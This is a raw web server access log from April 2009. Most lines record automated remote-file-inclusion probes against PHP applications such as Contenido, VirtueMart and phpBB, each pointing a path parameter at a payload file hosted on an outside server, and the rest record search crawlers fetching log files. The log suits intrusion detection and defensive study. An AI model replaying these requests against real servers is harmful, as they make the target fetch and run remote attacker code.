213.180.63.226 - - [08/Apr/2009:21:33:10 -0500] "GET /logs//contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://www.fuscaclubedealagoas.com.br/vnc/albania.txt?? HTTP/1.1" 404 342 "-""libwww-perl/5.812"
213.180.63.226 - - [08/Apr/2009:21:33:10 -0500] "GET //contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://www.fuscaclubedealagoas.com.br/vnc/albania.txt?? HTTP/1.1" 404 337 "-""libwww-perl/5.812"
67.205.102.239 - - [08/Apr/2009:21:33:45 -0500] "GET /logs/lostpasswd.php?env[include_prefix]=%22http://www.fuscaclubedealagoas.com.br/vnc/albania.txt?? HTTP/1.1" 404 302 "-""libwww-perl/5.813"
67.205.102.239 - - [08/Apr/2009:21:33:46 -0500] "GET /lostpasswd.php?env[include_prefix]=%22http://www.fuscaclubedealagoas.com.br/vnc/albania.txt?? HTTP/1.1" 404 297 "-""libwww-perl/5.813"
206.51.230.20 - - [08/Apr/2009:21:36:55 -0500] "GET /logs/access_log.1237075200 HTTP/1.1" 200 163840 "-""Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)"
222.236.44.38 - - [08/Apr/2009:21:37:30 -0500] "GET /main.php?appserv_root=http://midnightcr3w.justfree.com/Fx29id.txt??? HTTP/1.1" 404 291 "-""Mozilla/5.0"
222.236.44.38 - - [08/Apr/2009:21:37:30 -0500] "GET /logs/access_log.1231200000/main.php?appserv_root=http://midnightcr3w.justfree.com/Fx29id.txt??? HTTP/1.1" 404 318 "-""Mozilla/5.0"
222.236.44.38 - - [08/Apr/2009:21:37:30 -0500] "GET /logs/main.php?appserv_root=http://midnightcr3w.justfree.com/Fx29id.txt??? HTTP/1.1" 404 296 "-""Mozilla/5.0"
222.236.44.38 - - [08/Apr/2009:21:37:37 -0500] "GET /logs/access_log.1232323200/main.php?appserv_root=http://midnightcr3w.justfree.com/Fx29id.txt??? HTTP/1.1" 404 318 "-""Mozilla/5.0"
66.112.55.170 - - [08/Apr/2009:21:38:34 -0500] "GET /robots.txt HTTP/1.0" 404 281 "http://majestic12.co.uk/bot.php?I=1A48BD273F-40E12B26327D322E-fortpit_pconline_com""Mozilla/5.0 (compatible; MJ12bot/v1.2.4; http://www.majestic12.co.uk/bot.php?+)"
66.112.55.170 - - [08/Apr/2009:21:38:39 -0500] "GET /logs/access_log.1226275200 HTTP/1.1" 200 177702 "-""Mozilla/5.0 (compatible; MJ12bot/v1.2.4; http://www.majestic12.co.uk/bot.php?+)"
66.112.55.170 - - [08/Apr/2009:21:38:51 -0500] "GET /logs/access_log.1229126400 HTTP/1.1" 200 26019 "-""Mozilla/5.0 (compatible; MJ12bot/v1.2.4; http://www.majestic12.co.uk/bot.php?+)"
66.112.55.170 - - [08/Apr/2009:21:39:09 -0500] "GET /logs/access_log.1229472000 HTTP/1.1" 200 14129 "-""Mozilla/5.0 (compatible; MJ12bot/v1.2.4; http://www.majestic12.co.uk/bot.php?+)"
66.112.55.170 - - [08/Apr/2009:21:39:13 -0500] "GET /logs/access_log.1230508800 HTTP/1.1" 200 113113 "-""Mozilla/5.0 (compatible; MJ12bot/v1.2.4; http://www.majestic12.co.uk/bot.php?+)"
66.112.55.170 - - [08/Apr/2009:21:39:17 -0500] "GET /logs/access_log.1230681600 HTTP/1.1" 200 95741 "-""Mozilla/5.0 (compatible; MJ12bot/v1.2.4; http://www.majestic12.co.uk/bot.php?+)"
66.112.55.170 - - [08/Apr/2009:21:39:22 -0500] "GET /logs/access_log.1231632000 HTTP/1.1" 200 75840 "-""Mozilla/5.0 (compatible; MJ12bot/v1.2.4; http://www.majestic12.co.uk/bot.php?+)"
66.112.55.170 - - [08/Apr/2009:21:39:26 -0500] "GET /logs/access_log.1231977600 HTTP/1.1" 200 112712 "-""Mozilla/5.0 (compatible; MJ12bot/v1.2.4; http://www.majestic12.co.uk/bot.php?+)"
66.112.55.170 - - [08/Apr/2009:21:39:30 -0500] "GET /logs/access_log.1232755200 HTTP/1.1" 200 125154 "-""Mozilla/5.0 (compatible; MJ12bot/v1.2.4; http://www.majestic12.co.uk/bot.php?+)"
66.112.55.170 - - [08/Apr/2009:21:39:33 -0500] "GET /logs/access_log.1233014400 HTTP/1.1" 200 84572 "-""Mozilla/5.0 (compatible; MJ12bot/v1.2.4; http://www.majestic12.co.uk/bot.php?+)"
66.112.55.170 - - [08/Apr/2009:21:39:38 -0500] "GET /logs/access_log.1233360000 HTTP/1.1" 200 92841 "-""Mozilla/5.0 (compatible; MJ12bot/v1.2.4; http://www.majestic12.co.uk/bot.php?+)"
66.112.55.170 - - [08/Apr/2009:21:39:47 -0500] "GET /logs/access_log.1233619200 HTTP/1.1" 200 168494 "-""Mozilla/5.0 (compatible; MJ12bot/v1.2.4; http://www.majestic12.co.uk/bot.php?+)"
66.112.55.170 - - [08/Apr/2009:21:39:50 -0500] "GET /logs/access_log.1233878400 HTTP/1.1" 200 104478 "-""Mozilla/5.0 (compatible; MJ12bot/v1.2.4; http://www.majestic12.co.uk/bot.php?+)"
66.112.55.170 - - [08/Apr/2009:21:39:54 -0500] "GET /logs/access_log.1234051200 HTTP/1.1" 200 112812 "-""Mozilla/5.0 (compatible; MJ12bot/v1.2.4; http://www.majestic12.co.uk/bot.php?+)"
66.112.55.170 - - [08/Apr/2009:21:39:58 -0500] "GET /logs/access_log.1234224000 HTTP/1.1" 200 127661 "-""Mozilla/5.0 (compatible; MJ12bot/v1.2.4; http://www.majestic12.co.uk/bot.php?+)"
66.112.55.170 - - [08/Apr/2009:21:40:02 -0500] "GET /logs/access_log.1234483200 HTTP/1.1" 200 148921 "-""Mozilla/5.0 (compatible; MJ12bot/v1.2.4; http://www.majestic12.co.uk/bot.php?+)"
66.112.55.170 - - [08/Apr/2009:21:40:07 -0500] "GET /logs/access_log.1234569600 HTTP/1.1" 200 122840 "-""Mozilla/5.0 (compatible; MJ12bot/v1.2.4; http://www.majestic12.co.uk/bot.php?+)"
66.112.55.170 - - [08/Apr/2009:21:40:15 -0500] "GET /logs/access_log.1234656000 HTTP/1.1" 200 120526 "-""Mozilla/5.0 (compatible; MJ12bot/v1.2.4; http://www.majestic12.co.uk/bot.php?+)"
65.55.208.136 - - [08/Apr/2009:21:41:10 -0500] "GET /logs/access_log.1221177600 HTTP/1.1" 200 5638 "-""msnbot/1.1 (+http://search.msn.com/msnbot.htm)"
65.55.208.136 - - [08/Apr/2009:21:41:11 -0500] "GET /logs/access_log.1197158400 HTTP/1.1" 200 2240 "-""msnbot/1.1 (+http://search.msn.com/msnbot.htm)"
65.55.208.136 - - [08/Apr/2009:21:41:11 -0500] "GET /logs/access_log.1213660800 HTTP/1.1" 200 17834 "-""msnbot/1.1 (+http://search.msn.com/msnbot.htm)"
65.55.208.136 - - [08/Apr/2009:21:41:12 -0500] "GET /logs/access_log.1141516800 HTTP/1.1" 200 7284 "-""msnbot/1.1 (+http://search.msn.com/msnbot.htm)"
65.55.208.136 - - [08/Apr/2009:21:41:13 -0500] "GET /logs/access_log.1134259200 HTTP/1.1" 200 330 "-""msnbot/1.1 (+http://search.msn.com/msnbot.htm)"
202.165.244.10 - - [08/Apr/2009:21:42:29 -0500] "GET /logs/lostpasswd.php?env[include_prefix]=%22http://www.fuscaclubedealagoas.com.br/vnc/albania.txt?? HTTP/1.1" 404 302 "-""libwww-perl/5.79"
202.165.244.10 - - [08/Apr/2009:21:42:29 -0500] "GET /lostpasswd.php?env[include_prefix]=%22http://www.fuscaclubedealagoas.com.br/vnc/albania.txt?? HTTP/1.1" 404 297 "-""libwww-perl/5.79"
202.165.244.10 - - [08/Apr/2009:21:42:41 -0500] "GET /logs/lostpasswd.php?env[include_prefix]=%22http://www.fuscaclubedealagoas.com.br/vnc/albania.txt?? HTTP/1.1" 404 302 "-""libwww-perl/5.79"
202.165.244.10 - - [08/Apr/2009:21:42:42 -0500] "GET /lostpasswd.php?env[include_prefix]=%22http://www.fuscaclubedealagoas.com.br/vnc/albania.txt?? HTTP/1.1" 404 297 "-""libwww-perl/5.79"
213.180.63.226 - - [08/Apr/2009:21:42:51 -0500] "GET /logs/lostpasswd.php?env[include_prefix]=%22http://www.fuscaclubedealagoas.com.br/vnc/albania.txt?? HTTP/1.1" 404 302 "-""libwww-perl/5.812"
213.180.63.226 - - [08/Apr/2009:21:42:55 -0500] "GET /lostpasswd.php?env[include_prefix]=%22http://www.fuscaclubedealagoas.com.br/vnc/albania.txt?? HTTP/1.1" 404 297 "-""libwww-perl/5.812"
213.180.63.226 - - [08/Apr/2009:21:43:02 -0500] "GET /logs/lostpasswd.php?env[include_prefix]=%22http://www.fuscaclubedealagoas.com.br/vnc/albania.txt?? HTTP/1.1" 404 302 "-""libwww-perl/5.812"
83.208.211.167 - - [08/Apr/2009:21:43:05 -0500] "GET /lostpasswd.php?env[include_prefix]=%22http://www.fuscaclubedealagoas.com.br/vnc/albania.txt?? HTTP/1.1" 404 297 "-""libwww-perl/5.812"
65.55.208.136 - - [08/Apr/2009:21:44:03 -0500] "GET /logs/access_log.1233100800 HTTP/1.1" 200 77003 "-""msnbot/1.1 (+http://search.msn.com/msnbot.htm)"
222.236.44.38 - - [08/Apr/2009:21:46:42 -0500] "GET /logs/access_log.1231200000/main.php?appserv_root=http://midnightcr3w.justfree.com/Fx29id.txt??? HTTP/1.1" 404 318 "-""Mozilla/5.0"
222.236.44.38 - - [08/Apr/2009:21:46:42 -0500] "GET /logs/main.php?appserv_root=http://midnightcr3w.justfree.com/Fx29id.txt??? HTTP/1.1" 404 296 "-""Mozilla/5.0"
222.236.44.38 - - [08/Apr/2009:21:46:47 -0500] "GET /main.php?appserv_root=http://midnightcr3w.justfree.com/Fx29id.txt??? HTTP/1.1" 404 291 "-""Mozilla/5.0"
222.236.44.38 - - [08/Apr/2009:21:46:57 -0500] "GET /logs/access_log.1232323200/main.php?appserv_root=http://midnightcr3w.justfree.com/Fx29id.txt??? HTTP/1.1" 404 318 "-""Mozilla/5.0"
193.178.144.180 - - [08/Apr/2009:21:48:28 -0500] "GET /logs///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.candidography.com/zero/id1.txt?? HTTP/1.1" 404 340 "-""Mozilla/5.0"
193.178.144.180 - - [08/Apr/2009:21:48:28 -0500] "GET ///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.candidography.com/zero/id1.txt?? HTTP/1.1" 404 335 "-""Mozilla/5.0"
193.178.144.180 - - [08/Apr/2009:21:48:28 -0500] "GET /logs/access_log.1236729600///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.candidography.com/zero/id1.txt?? HTTP/1.1" 404 362 "-""Mozilla/5.0"
213.9.74.150 - - [08/Apr/2009:21:51:58 -0500] "GET /modules/Forums/admin/admin_db_utilities.php?phpbb_root_path=http://www.bigx.co.cc/titip/idfx1.txt? HTTP/1.1" 404 326 "-""Mozilla/5.0"
213.9.74.150 - - [08/Apr/2009:21:52:03 -0500] "GET /modules/Forums/admin/admin_db_utilities.php?phpbb_root_path=http://www.bigx.co.cc/titip/idfx1.txt? HTTP/1.1" 404 326 "-""Mozilla/5.0"
213.9.74.150 - - [08/Apr/2009:21:52:03 -0500] "GET /logs/modules/Forums/admin/admin_db_utilities.php?phpbb_root_path=http://www.bigx.co.cc/titip/idfx1.txt? HTTP/1.1" 404 331 "-""Mozilla/5.0"
213.9.74.150 - - [08/Apr/2009:21:52:03 -0500] "GET /logs/access_log.1234137600/modules/Forums/admin/admin_db_utilities.php?phpbb_root_path=http://www.bigx.co.cc/titip/idfx1.txt? HTTP/1.1" 404 353 "-""Mozilla/5.0"
213.9.74.150 - - [08/Apr/2009:21:52:05 -0500] "GET /logs/modules/Forums/admin/admin_db_utilities.php?phpbb_root_path=http://www.bigx.co.cc/titip/idfx1.txt? HTTP/1.1" 404 331 "-""Mozilla/5.0"
213.9.74.150 - - [08/Apr/2009:21:52:05 -0500] "GET /logs/access_log.1234137600/modules/Forums/admin/admin_db_utilities.php?phpbb_root_path=http://www.bigx.co.cc/titip/idfx1.txt? HTTP/1.1" 404 353 "-""Mozilla/5.0"
213.9.74.150 - - [08/Apr/2009:21:52:05 -0500] "GET /logs/access_log.1232668800/modules/Forums/admin/admin_db_utilities.php?phpbb_root_path=http://www.bigx.co.cc/titip/idfx1.txt? HTTP/1.1" 404 353 "-""Mozilla/5.0"
213.9.74.150 - - [08/Apr/2009:21:52:08 -0500] "GET /logs/access_log.1232668800/modules/Forums/admin/admin_db_utilities.php?phpbb_root_path=http://www.bigx.co.cc/titip/idfx1.txt? HTTP/1.1" 404 353 "-""Mozilla/5.0"
67.205.102.239 - - [08/Apr/2009:22:06:01 -0500] "GET /logs//admin/classes/TplLoad.php?full_path_to_public_program=http://www.fuscaclubedealagoas.com.br/vnc/albania.txt?? HTTP/1.1" 404 314 "-""libwww-perl/5.813"
67.205.102.239 - - [08/Apr/2009:22:06:02 -0500] "GET //admin/classes/TplLoad.php?full_path_to_public_program=http://www.fuscaclubedealagoas.com.br/vnc/albania.txt?? HTTP/1.1" 404 309 "-""libwww-perl/5.813"
67.205.102.239 - - [08/Apr/2009:22:06:12 -0500] "GET /logs//admin/classes/TplLoad.php?full_path_to_public_program=http://www.fuscaclubedealagoas.com.br/vnc/albania.txt?? HTTP/1.1" 404 314 "-""libwww-perl/5.813"
67.205.102.239 - - [08/Apr/2009:22:06:12 -0500] "GET //admin/classes/TplLoad.php?full_path_to_public_program=http://www.fuscaclubedealagoas.com.br/vnc/albania.txt?? HTTP/1.1" 404 309 "-""libwww-perl/5.813"
65.55.208.135 - - [08/Apr/2009:22:06:37 -0500] "GET /logs/access_log.1199664000 HTTP/1.1" 200 1799 "-""msnbot/1.1 (+http://search.msn.com/msnbot.htm)"
206.221.215.41 - - [08/Apr/2009:22:07:29 -0500] "GET //bbshop/shop/index.php?_shop_path=http://www.fuscaclubedealagoas.com.br/vnc/fx29id.txt?? HTTP/1.1" 404 305 "-""Mozilla/5.0"
206.221.215.41 - - [08/Apr/2009:22:07:29 -0500] "GET /logs//bbshop/shop/index.php?_shop_path=http://www.fuscaclubedealagoas.com.br/vnc/fx29id.txt?? HTTP/1.1" 404 310 "-""Mozilla/5.0"
206.221.215.41 - - [08/Apr/2009:22:07:29 -0500] "GET /logs/access_log.1231027200//bbshop/shop/index.php?_shop_path=http://www.fuscaclubedealagoas.com.br/vnc/fx29id.txt?? HTTP/1.1" 404 332 "-""Mozilla/5.0"
206.221.215.41 - - [08/Apr/2009:22:07:29 -0500] "GET /logs/access_log.1237248000//bbshop/shop/index.php?_shop_path=http://www.fuscaclubedealagoas.com.br/vnc/fx29id.txt?? HTTP/1.1" 404 332 "-""Mozilla/5.0"
202.165.244.10 - - [08/Apr/2009:22:11:40 -0500] "GET /logs//admin/classes/TplLoad.php?full_path_to_public_program=http://www.fuscaclubedealagoas.com.br/vnc/albania.txt?? HTTP/1.1" 404 314 "-""libwww-perl/5.79"
202.165.244.10 - - [08/Apr/2009:22:11:40 -0500] "GET //admin/classes/TplLoad.php?full_path_to_public_program=http://www.fuscaclubedealagoas.com.br/vnc/albania.txt?? HTTP/1.1" 404 309 "-""libwww-perl/5.79"
202.165.244.10 - - [08/Apr/2009:22:12:23 -0500] "GET /logs//admin/classes/TplLoad.php?full_path_to_public_program=http://www.fuscaclubedealagoas.com.br/vnc/albania.txt?? HTTP/1.1" 404 314 "-""libwww-perl/5.79"
202.165.244.10 - - [08/Apr/2009:22:12:23 -0500] "GET //admin/classes/TplLoad.php?full_path_to_public_program=http://www.fuscaclubedealagoas.com.br/vnc/albania.txt?? HTTP/1.1" 404 309 "-""libwww-perl/5.79"
89.187.131.186 - - [08/Apr/2009:22:14:19 -0500] "GET ///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.candidography.com/zero/id1.txt?? HTTP/1.1" 404 335 "-""Mozilla/5.0"
89.187.131.186 - - [08/Apr/2009:22:14:19 -0500] "GET /logs///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.candidography.com/zero/id1.txt?? HTTP/1.1" 404 340 "-""Mozilla/5.0"
89.187.131.186 - - [08/Apr/2009:22:14:19 -0500] "GET /logs/access_log.1236729600///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.candidography.com/zero/id1.txt?? HTTP/1.1" 404 362 "-""Mozilla/5.0"
83.208.211.167 - - [08/Apr/2009:22:15:31 -0500] "GET /logs//admin/classes/TplLoad.php?full_path_to_public_program=http://www.fuscaclubedealagoas.com.br/vnc/albania.txt?? HTTP/1.1" 404 314 "-""libwww-perl/5.812"
213.180.63.226 - - [08/Apr/2009:22:15:34 -0500] "GET //admin/classes/TplLoad.php?full_path_to_public_program=http://www.fuscaclubedealagoas.com.br/vnc/albania.txt?? HTTP/1.1" 404 309 "-""libwww-perl/5.812"
213.180.63.226 - - [08/Apr/2009:22:15:52 -0500] "GET /logs//admin/classes/TplLoad.php?full_path_to_public_program=http://www.fuscaclubedealagoas.com.br/vnc/albania.txt?? HTTP/1.1" 404 314 "-""libwww-perl/5.812"
213.180.63.226 - - [08/Apr/2009:22:15:52 -0500] "GET //admin/classes/TplLoad.php?full_path_to_public_program=http://www.fuscaclubedealagoas.com.br/vnc/albania.txt?? HTTP/1.1" 404 309 "-""libwww-perl/5.812"
200.162.171.247 - - [08/Apr/2009:22:19:27 -0500] "GET /logs//bbshop/shop/index.php?_shop_path=http://www.fuscaclubedealagoas.com.br/vnc/fx29id.txt?? HTTP/1.1" 404 310 "-""Mozilla/5.0"
200.162.171.247 - - [08/Apr/2009:22:19:27 -0500] "GET //bbshop/shop/index.php?_shop_path=http://www.fuscaclubedealagoas.com.br/vnc/fx29id.txt?? HTTP/1.1" 404 305 "-""Mozilla/5.0"
200.162.171.247 - - [08/Apr/2009:22:19:27 -0500] "GET /logs/access_log.1231027200//bbshop/shop/index.php?_shop_path=http://www.fuscaclubedealagoas.com.br/vnc/fx29id.txt?? HTTP/1.1" 404 332 "-""Mozilla/5.0"
200.162.171.247 - - [08/Apr/2009:22:19:55 -0500] "GET /logs/access_log.1237248000//bbshop/shop/index.php?_shop_path=http://www.fuscaclubedealagoas.com.br/vnc/fx29id.txt?? HTTP/1.1" 404 332 "-""Mozilla/5.0"
81.91.84.17 - - [08/Apr/2009:22:34:14 -0500] "GET /administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.ppclub.co.kr/bbs/11.txt???? HTTP/1.1" 404 333 "-""Mozilla/5.0"
81.91.84.17 - - [08/Apr/2009:22:34:14 -0500] "GET /logs/administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.ppclub.co.kr/bbs/11.txt???? HTTP/1.1" 404 338 "-""Mozilla/5.0"
81.91.84.17 - - [08/Apr/2009:22:34:14 -0500] "GET /logs/access_log.1236729600/administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.ppclub.co.kr/bbs/11.txt???? HTTP/1.1" 404 360 "-""Mozilla/5.0"
122.116.178.20 - - [08/Apr/2009:22:38:09 -0500] "GET /logs//index.php?DOCUMENT_ROOT=http://www.azonzotravel.com/readme.txt??? HTTP/1.1" 404 298 "-""libwww-perl/5.79"
65.55.208.133 - - [08/Apr/2009:22:38:24 -0500] "GET /logs/access_log.1160956800 HTTP/1.1" 200 1312 "-""msnbot/1.1 (+http://search.msn.com/msnbot.htm)"
65.55.208.133 - - [08/Apr/2009:22:38:26 -0500] "GET /logs/access_log.1124496000 HTTP/1.1" 200 341 "-""msnbot/1.1 (+http://search.msn.com/msnbot.htm)"
65.55.208.133 - - [08/Apr/2009:22:38:29 -0500] "GET /logs/access_log.1148688000 HTTP/1.1" 200 2071 "-""msnbot/1.1 (+http://search.msn.com/msnbot.htm)"
122.116.178.20 - - [08/Apr/2009:22:51:55 -0500] "GET /logs//index.php?DOCUMENT_ROOT=http://www.azonzotravel.com/readme.txt??? HTTP/1.1" 404 298 "-""libwww-perl/5.79"
122.116.178.20 - - [08/Apr/2009:22:51:56 -0500] "GET //index.php?DOCUMENT_ROOT=http://www.azonzotravel.com/readme.txt??? HTTP/1.1" 404 293 "-""libwww-perl/5.79"
65.55.208.131 - - [08/Apr/2009:23:02:02 -0500] "GET /logs/access_log.1140480000 HTTP/1.1" 200 664 "-""msnbot/1.1 (+http://search.msn.com/msnbot.htm)"
65.55.208.131 - - [08/Apr/2009:23:02:09 -0500] "GET /logs/access_log.1146960000 HTTP/1.1" 200 2071 "-""msnbot/1.1 (+http://search.msn.com/msnbot.htm)"
65.55.208.131 - - [08/Apr/2009:23:02:16 -0500] "GET /logs/access_log.1213920000 HTTP/1.1" 200 656 "-""msnbot/1.1 (+http://search.msn.com/msnbot.htm)"
206.210.96.34 - - [08/Apr/2009:23:06:18 -0500] "GET /?DOCUMENT_ROOT=http://www.geocities.com/cantikpuri/id.txt%0D?? HTTP/1.1" 200 3245 "-""libwww-perl/5.79"
206.210.96.34 - - [08/Apr/2009:23:06:23 -0500] "GET /logs/?DOCUMENT_ROOT=http://www.geocities.com/cantikpuri/id.txt%0D?? HTTP/1.1" 200 36689 "-""libwww-perl/5.79"
206.210.96.34 - - [08/Apr/2009:23:06:25 -0500] "GET /?DOCUMENT_ROOT=http://www.geocities.com/cantikpuri/id.txt%0D?? HTTP/1.1" 200 3245 "-""libwww-perl/5.79"
206.210.96.34 - - [08/Apr/2009:23:06:26 -0500] "GET /logs/?DOCUMENT_ROOT=http://www.geocities.com/cantikpuri/id.txt%0D?? HTTP/1.1" 200 184865 "-""libwww-perl/5.79"
65.55.208.140 - - [08/Apr/2009:23:10:46 -0500] "GET /logs/access_log.1116374400 HTTP/1.1" 200 332 "-""msnbot/1.1 (+http://search.msn.com/msnbot.htm)"
65.55.208.140 - - [08/Apr/2009:23:11:12 -0500] "GET /logs/access_log.1192665600 HTTP/1.1" 200 3302 "-""msnbot/1.1 (+http://search.msn.com/msnbot.htm)"
189.47.226.197 - - [08/Apr/2009:23:11:17 -0500] "GET /logs/access_log.1238112000http://files.myopera.com/thiagonab/files/pbot.txt? HTTP/1.1" 404 358 "-""Mozilla/3.0 (compatible; Indy Library)"
203.22.204.193 - - [08/Apr/2009:23:20:51 -0500] "GET /logs/error.php?error.php=http://www.wizard.com.br/id.txt?? HTTP/1.1" 404 297 "-""libwww-perl/5.76"
203.22.204.193 - - [08/Apr/2009:23:20:51 -0500] "GET /error.php?error.php=http://www.wizard.com.br/id.txt?? HTTP/1.1" 404 292 "-""libwww-perl/5.76"
203.22.204.193 - - [08/Apr/2009:23:20:53 -0500] "GET /logs/error.php?error.php=http://www.wizard.com.br/id.txt?? HTTP/1.1" 404 297 "-""libwww-perl/5.76"
203.22.204.193 - - [08/Apr/2009:23:20:53 -0500] "GET /error.php?error.php=http://www.wizard.com.br/id.txt?? HTTP/1.1" 404 292 "-""libwww-perl/5.76"
65.55.208.139 - - [08/Apr/2009:23:21:53 -0500] "GET /logs/access_log.1120176000 HTTP/1.1" 200 1471 "-""msnbot/1.1 (+http://search.msn.com/msnbot.htm)"
65.55.208.139 - - [08/Apr/2009:23:21:54 -0500] "GET /logs/access_log.1106092800 HTTP/1.1" 200 8416 "-""msnbot/1.1 (+http://search.msn.com/msnbot.htm)"
217.114.210.8 - - [08/Apr/2009:23:23:28 -0500] "GET /logs/components/com_pcchess/include.pcchess.php?mosConfig_absolute_path=http://www.holweger.eu//templates/madeyourwebs/images/bajo-id.txt??? HTTP/1.1" 404 330 "-""libwww-perl/5.65"
217.114.210.8 - - [08/Apr/2009:23:23:28 -0500] "GET /logs/components/com_pcchess/include.pcchess.php?mosConfig_absolute_path=http://www.holweger.eu//templates/madeyourwebs/images/bajo-id.txt??? HTTP/1.1" 404 330 "-""libwww-perl/5.65"
217.114.210.8 - - [08/Apr/2009:23:23:28 -0500] "GET /components/com_pcchess/include.pcchess.php?mosConfig_absolute_path=http://www.holweger.eu//templates/madeyourwebs/images/bajo-id.txt??? HTTP/1.1" 404 325 "-""libwww-perl/5.65"
217.114.210.8 - - [08/Apr/2009:23:23:28 -0500] "GET /components/com_pcchess/include.pcchess.php?mosConfig_absolute_path=http://www.holweger.eu//templates/madeyourwebs/images/bajo-id.txt??? HTTP/1.1" 404 325 "-""libwww-perl/5.65"
189.47.226.197 - - [08/Apr/2009:23:24:27 -0500] "GET /logs/access_log.1238112000http://files.myopera.com/thiagonab/fvoxx/pbot.txt? HTTP/1.1" 404 358 "-""Mozilla/3.0 (compatible; Indy Library)"
216.67.244.130 - - [08/Apr/2009:23:30:00 -0500] "GET /logs/include/lib.inc.php?site_path=http://www.candidography.com/zero/id1.txt?? HTTP/1.1" 404 307 "-""Mozilla/5.0"
216.67.244.130 - - [08/Apr/2009:23:30:00 -0500] "GET /include/lib.inc.php?site_path=http://www.candidography.com/zero/id1.txt?? HTTP/1.1" 404 302 "-""Mozilla/5.0"
216.67.244.130 - - [08/Apr/2009:23:30:05 -0500] "GET /logs/access_log.1233705600/include/lib.inc.php?site_path=http://www.candidography.com/zero/id1.txt?? HTTP/1.1" 404 329 "-""Mozilla/5.0"
216.67.244.130 - - [08/Apr/2009:23:30:05 -0500] "GET /logs/access_log.1236211200/include/lib.inc.php?site_path=http://www.candidography.com/zero/id1.txt?? HTTP/1.1" 404 329 "-""Mozilla/5.0"
74.124.194.104 - - [08/Apr/2009:23:30:51 -0500] "GET /logs/include/lib.inc.php?site_path=http://www.candidography.com/zero/id1.txt?? HTTP/1.1" 404 307 "-""Mozilla/5.0"
74.124.194.104 - - [08/Apr/2009:23:30:51 -0500] "GET /logs/access_log.1233705600/include/lib.inc.php?site_path=http://www.candidography.com/zero/id1.txt?? HTTP/1.1" 404 329 "-""Mozilla/5.0"
74.124.194.104 - - [08/Apr/2009:23:30:51 -0500] "GET /include/lib.inc.php?site_path=http://www.candidography.com/zero/id1.txt?? HTTP/1.1" 404 302 "-""Mozilla/5.0"
74.124.194.104 - - [08/Apr/2009:23:30:55 -0500] "GET /logs/access_log.1236211200/include/lib.inc.php?site_path=http://www.candidography.com/zero/id1.txt?? HTTP/1.1" 404 329 "-""Mozilla/5.0"
195.35.82.155 - - [08/Apr/2009:23:31:55 -0500] "GET /logs/access_log.1233705600/include/lib.inc.php?site_path=http://www.candidography.com/zero/id1.txt?? HTTP/1.1" 404 329 "-""Mozilla/5.0"
195.35.82.155 - - [08/Apr/2009:23:31:55 -0500] "GET /logs/include/lib.inc.php?site_path=http://www.candidography.com/zero/id1.txt?? HTTP/1.1" 404 307 "-""Mozilla/5.0"
195.35.82.155 - - [08/Apr/2009:23:31:55 -0500] "GET /include/lib.inc.php?site_path=http://www.candidography.com/zero/id1.txt?? HTTP/1.1" 404 302 "-""Mozilla/5.0"
77.105.2.252 - - [08/Apr/2009:23:32:05 -0500] "GET /include/lib.inc.php?site_path=http://www.candidography.com/zero/id1.txt?? HTTP/1.1" 404 302 "-""Mozilla/5.0"
77.105.2.252 - - [08/Apr/2009:23:32:05 -0500] "GET /logs/include/lib.inc.php?site_path=http://www.candidography.com/zero/id1.txt?? HTTP/1.1" 404 307 "-""Mozilla/5.0"
77.105.2.252 - - [08/Apr/2009:23:32:05 -0500] "GET /logs/access_log.1233705600/include/lib.inc.php?site_path=http://www.candidography.com/zero/id1.txt?? HTTP/1.1" 404 329 "-""Mozilla/5.0"
77.105.2.252 - - [08/Apr/2009:23:32:12 -0500] "GET /logs/access_log.1236211200/include/lib.inc.php?site_path=http://www.candidography.com/zero/id1.txt?? HTTP/1.1" 404 329 "-""Mozilla/5.0"
195.35.82.155 - - [08/Apr/2009:23:32:18 -0500] "GET /logs/access_log.1235260800/include/lib.inc.php?site_path=http://www.candidography.com/zero/id1.txt?? HTTP/1.1" 404 329 "-""Mozilla/5.0"
195.35.82.155 - - [08/Apr/2009:23:33:24 -0500] "GET /logs/access_log.1236211200/include/lib.inc.php?site_path=http://www.candidography.com/zero/id1.txt?? HTTP/1.1" 404 329 "-""Mozilla/5.0"
195.35.82.155 - - [08/Apr/2009:23:38:26 -0500] "GET /include/lib.inc.php?site_path=http://www.candidography.com/zero/id.txt?? HTTP/1.1" 404 302 "-""Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8b4) Gecko/20050908 Firefox/1.4"
195.35.82.155 - - [08/Apr/2009:23:38:26 -0500] "GET /logs/access_log.1233705600/include/lib.inc.php?site_path=http://www.candidography.com/zero/id.txt?? HTTP/1.1" 404 329 "-""Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8b4) Gecko/20050908 Firefox/1.4"
195.35.82.155 - - [08/Apr/2009:23:38:26 -0500] "GET /logs/include/lib.inc.php?site_path=http://www.candidography.com/zero/id.txt?? HTTP/1.1" 404 307 "-""Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8b4) Gecko/20050908 Firefox/1.4"
74.124.194.104 - - [08/Apr/2009:23:38:29 -0500] "GET /logs/access_log.1233705600/include/lib.inc.php?site_path=http://www.candidography.com/zero/id.txt?? HTTP/1.1" 404 329 "-""Mozilla/4.61 [en] (OS/2; U)"
74.124.194.104 - - [08/Apr/2009:23:38:29 -0500] "GET /include/lib.inc.php?site_path=http://www.candidography.com/zero/id.txt?? HTTP/1.1" 404 302 "-""Mozilla/4.61 [en] (OS/2; U)"
74.124.194.104 - - [08/Apr/2009:23:38:29 -0500] "GET /logs/include/lib.inc.php?site_path=http://www.candidography.com/zero/id.txt?? HTTP/1.1" 404 307 "-""Mozilla/4.61 [en] (OS/2; U)"
